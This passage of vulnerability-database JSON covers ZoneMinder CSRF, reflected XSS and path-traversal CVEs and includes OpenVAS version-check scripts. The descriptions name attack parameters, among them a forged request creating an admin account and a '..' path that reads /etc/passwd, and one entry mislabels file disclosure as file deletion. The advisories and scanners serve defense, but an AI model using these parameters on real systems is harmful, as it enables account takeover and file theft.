"userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-06T17:59:00", "id": "DEBIANCVE:CVE-2017-5367", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-03T18:32:05", "description": "ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attack to make changes to the web application as the current logged in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-02-06T17:59:00", "type": "debiancve", "title": "CVE-2017-5368", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5368"], "modified": "2017-02-06T17:59:00", "id": "DEBIANCVE:CVE-2017-5368", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5368", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T18:32:05", "description": "A file disclosure and inclusion vulnerability exists in web/views/file.php in ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being passed to readfile(), which allows an authenticated attacker to read local system files (e.g., /etc/passwd) in the context of the web server user (www-data). The attack vector is a .. (dot dot) in the path parameter within a zm/index.php?view=file&path= request.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-06T17:59:00", "type": "debiancve", "title": "CVE-2017-5595", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-02-06T17:59:00", "id": "DEBIANCVE:CVE-2017-5595", "href": "https://security-tracker.debian.org/tracker/CVE-2017-5595", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "prion": [{"lastseen": "2023-11-22T03:15:22", "description": "ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attack to make changes to the web application as the current logged in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-02-06T17:59:00", "type": "prion", "title": "Cross site request forgery (csrf)", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5368"], "modified": "2017-02-10T02:59:00", "id": "PRION:CVE-2017-5368", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5368", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:15:22", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-10T02:59:00", "id": "PRION:CVE-2017-5367", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-11-22T03:15:45", "description": "A file disclosure and inclusion vulnerability exists in web/views/file.php in ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being passed to readfile(), which allows an authenticated attacker to read local system files (e.g., /etc/passwd) in the context of the web server user (www-data). The attack vector is a .. (dot dot) in the path parameter within a zm/index.php?view=file&path= request.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-06T17:59:00", "type": "prion", "title": "Arbitrary file deletion", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-02-16T14:09:00", "id": "PRION:CVE-2017-5595", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-5595", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-12-03T15:29:06", "description": "ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attack to make changes to the web application as the current logged in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-02-06T17:59:00", "type": "cve", "title": "CVE-2017-5368", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5368"], "modified": "2017-02-10T02:59:00", "cpe": ["cpe:/a:zoneminder:zoneminder:1.29.0", "cpe:/a:zoneminder:zoneminder:1.30.0"], "id": "CVE-2017-5368", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5368", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zoneminder:zoneminder:1.29.0:*:*:*:*:*:*:*", "cpe:2.3:a:zoneminder:zoneminder:1.30.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:29:05", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "cve", "title": "CVE-2017-5367", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-10T02:59:00", "cpe": ["cpe:/a:zoneminder:zoneminder:1.29.0", "cpe:/a:zoneminder:zoneminder:1.30.0"], "id": "CVE-2017-5367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:zoneminder:zoneminder:1.29.0:*:*:*:*:*:*:*", "cpe:2.3:a:zoneminder:zoneminder:1.30.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:30:15", "description": "A file disclosure and inclusion vulnerability exists in web/views/file.php in ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being passed to readfile(), which allows an authenticated attacker to read local system files (e.g., /etc/passwd) in the context of the web server user (www-data). The attack vector is a .. (dot dot) in the path parameter within a zm/index.php?view=file&path= request.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-06T17:59:00", "type": "cve", "title": "CVE-2017-5595", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-02-16T14:09:00", "cpe": ["cpe:/a:zoneminder:zoneminder:1.30.0"], "id": "CVE-2017-5595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-5595", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:zoneminder:zoneminder:1.30.0:*:*:*:*:*:*:*"]}], "alpinelinux": [{"lastseen": "2023-12-03T16:03:17", "description": "ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, is vulnerable to CSRF (Cross Site Request Forgery) which allows a remote attack to make changes to the web application as the current logged in victim. If the victim visits a malicious web page, the attacker can silently and automatically create a new admin user within the web application for remote persistence and further attacks. The URL is /zm/index.php and sample parameters could include action=user uid=0 newUser[Username]=attacker1 newUser[Password]=Password1234 conf_password=Password1234 newUser[System]=Edit (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-02-06T17:59:00", "type": "alpinelinux", "title": "CVE-2017-5368", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5368"], "modified": "2017-02-10T02:59:00", "id": "ALPINE:CVE-2017-5368", "href": "https://security.alpinelinux.org/vuln/CVE-2017-5368", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-03T16:03:17", "description": "Multiple reflected XSS vulnerabilities exist within form and link input parameters of ZoneMinder v1.30 and v1.29, an open-source CCTV server web application, which allows a remote attacker to execute malicious scripts within an authenticated client's browser. The URL is /zm/index.php and sample parameters could include action=login&view=postlogin[XSS] view=console[XSS] view=groups[XSS] view=events&filter[terms][1][cnj]=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=and[XSS] view=events&filter%5Bterms%5D%5B1%5D%5Bcnj%5D=[XSS]and view=events&limit=1%22%3E%3C/a%3E[XSS] (among others).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-02-06T17:59:00", "type": "alpinelinux", "title": "CVE-2017-5367", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5367"], "modified": "2017-02-10T02:59:00", "id": "ALPINE:CVE-2017-5367", "href": "https://security.alpinelinux.org/vuln/CVE-2017-5367", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-12-03T16:03:17", "description": "A file disclosure and inclusion vulnerability exists in web/views/file.php in ZoneMinder 1.x through v1.30.0 because of unfiltered user-input being passed to readfile(), which allows an authenticated attacker to read local system files (e.g., /etc/passwd) in the context of the web server user (www-data). The attack vector is a .. (dot dot) in the path parameter within a zm/index.php?view=file&path= request.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-02-06T17:59:00", "type": "alpinelinux", "title": "CVE-2017-5595", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5595"], "modified": "2017-02-16T14:09:00", "id": "ALPINE:CVE-2017-5595", "href": "https://security.alpinelinux.org/vuln/CVE-2017-5595", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:34:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-02-20T00:00:00", "type": "openvas", "title": "Fedora Update for zoneminder FEDORA-2017-d5fb74cd2e", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5595"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872364", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872364", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zoneminder FEDORA-2017-d5fb74cd2e\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872364\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-20 11:39:05 +0100 (Mon, 20 Feb 2017)\");\n script_cve_id(\"CVE-2017-5595\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for zoneminder FEDORA-2017-d5fb74cd2e\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'zoneminder'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"zoneminder on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-d5fb74cd2e\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/25GCK3X4C2XY4YBBWCKSWDEYWBHTJKGV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"zoneminder\", rpm:\"zoneminder~1.28.1~8.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-29T20:09:30", "description": "Multiple vulnerabilities have been found in zoneminder. This update\nfixes only a serious file disclosure vulnerability (CVE-2017-5595).", "cvss3": {}, "published": "2018-02-08T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for zoneminder (DLA-1145-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5595"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891145", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891145", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891145\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-5595\");\n script_name(\"Debian LTS: Security Advisory for zoneminder (DLA-1145-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-02-08 00:00:00 +0100 (Thu, 08 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/10/msg00024.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/source-package/zoneminder\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"zoneminder on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"The application has been found to suffer from many other problems\nsuch as SQL injection vulnerabilities, cross-site scripting issues,\ncross-site request forgery, session fixation vulnerability. Due to the\namount of issues and to the relative invasiveness of the relevant patches,\nthose issues will not be fixed in Wheezy. We thus advise you to restrict\naccess to zoneminder to trusted users only. If you want to review the\nlist of ignored issues, you can check the referenced security tracker.\n\nWe recommend that you upgrade your zoneminder packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been found in zoneminder. This update\nfixes only a serious file disclosure vulnerability (CVE-2017-5595).\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"zoneminder\", ver:\"1.25.0-4+deb7u2\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:29", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-02-20T00:00:00", "type": "openvas", "title": "Fedora Update for zoneminder FEDORA-2017-2bb174ae3c", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5595"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872361", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872361", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for zoneminder FEDORA-2017-2bb174ae3c\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 